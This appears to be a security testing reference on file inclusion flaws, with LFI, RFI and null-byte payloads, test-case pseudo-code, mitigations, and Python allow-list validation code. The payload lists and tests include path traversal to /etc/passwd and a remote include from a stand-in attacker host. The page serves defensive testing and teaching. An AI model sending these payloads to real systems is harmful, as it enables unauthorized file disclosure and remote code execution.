File Inclusion
Description
File Inclusion occurs when a web application includes files based on user input without proper validation. This can lead to arbitrary file inclusion, allowing attackers to read sensitive files or execute arbitrary code.
Example with Scenario
Scenario: A web application dynamically includes a file based on a URL parameter. An attacker can manipulate the parameter to include sensitive files from the server.
Payloads and Test Cases
Payloads
Local File Inclusion (LFI):
/include?file=../../../../etc/passwd
Remote File Inclusion (RFI):
/include?file=http://attacker.com/malicious.php
Null Byte Injection:
/include?file=../../../../etc/passwd%00
Test Cases
Local File Inclusion (LFI):
Payload:
/include?file=../../../../etc/passwd
Test Case:
# Send payload to the server
sendPayloadToServer("/include?file=../../../../etc/passwd")
# Verify if the application includes the /etc/passwd file
checkFileInclusion("/etc/passwd")
Remote File Inclusion (RFI):
Payload:
/include?file=http://attacker.com/malicious.php
Test Case:
# Send payload to the server
sendPayloadToServer("/include?file=http://attacker.com/malicious.php")
# Verify if the application includes the remote file
checkRemoteFileInclusion("http://attacker.com/malicious.php")
Null Byte Injection:
Payload:
/include?file=../../../../etc/passwd%00
Test Case:
# Send payload to the server
sendPayloadToServer("/include?file=../../../../etc/passwd%00")
# Verify if the application includes the /etc/passwd file despite the null byte
checkFileInclusion("/etc/passwd")
Mitigation
Input Validation:
Validate and sanitize user input to ensure it does not contain malicious paths.
Use allow-lists to restrict input to expected file paths.
Disable Dynamic Inclusion:
Avoid using dynamic file inclusion based on user input.
Use static file paths or mapped identifiers for inclusion.
Limit File Access:
Restrict file access permissions to only necessary files.
Use chroot or containerization to limit file system exposure.
Error Handling:
Implement proper error handling to avoid revealing file system structure.
Return generic error messages without disclosing sensitive information.
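The allow-list and mapped-identifier mitigations above, as an added example that is not code from the original page: the vulnerable pattern is shown only for contrast, `safe_include_path` implements the mapped-identifier fix, and `reject_reason` is the fallback validation for legacy code that must still accept a filename. `TEMPLATE_DIR` and `INCLUDE_MAP` are hypothetical, and inputs are assumed to be already URL-decoded (so `%00` has become a real NUL byte).

```python
import posixpath
from typing import Optional

# Hypothetical layout: only files under this directory may ever be included.
TEMPLATE_DIR = "/var/www/app/templates"

# Allow-list: a request names an identifier, never a path ("mapped identifiers").
INCLUDE_MAP = {
    "home": "home.html",
    "about": "about.html",
    "contact": "contact.html",
}


def vulnerable_include_path(user_file: str) -> str:
    """The pattern the page warns about: raw user input becomes the file path.
    Kept only to contrast with the two hardened functions below."""
    return posixpath.join(TEMPLATE_DIR, user_file)


def safe_include_path(identifier: str) -> Optional[str]:
    """Preferred fix: look the identifier up in the allow-list.
    Anything not in the map is rejected, so no user-supplied path is ever used."""
    filename = INCLUDE_MAP.get(identifier)
    if filename is None:
        return None
    return posixpath.join(TEMPLATE_DIR, filename)


def reject_reason(user_file: str, base: str = TEMPLATE_DIR) -> Optional[str]:
    """Fallback validation for legacy code that must accept a filename.
    Returns None if the name is acceptable, otherwise why it was rejected."""
    if "\x00" in user_file:
        return "null byte"
    if "://" in user_file:
        return "remote URL"
    # Collapse '..' segments lexically, then require the result to stay under base.
    candidate = posixpath.normpath(posixpath.join(base, user_file))
    if posixpath.commonpath([base, candidate]) != base:
        return "path traversal"
    return None


if __name__ == "__main__":
    for payload in ("about", "../../../../etc/passwd"):
        print(repr(payload), "->", safe_include_path(payload), reject_reason(payload))
```

The containment check is purely lexical, so a symlink inside the template directory can still point outside it; that is one more reason to prefer the allow-list over filename validation.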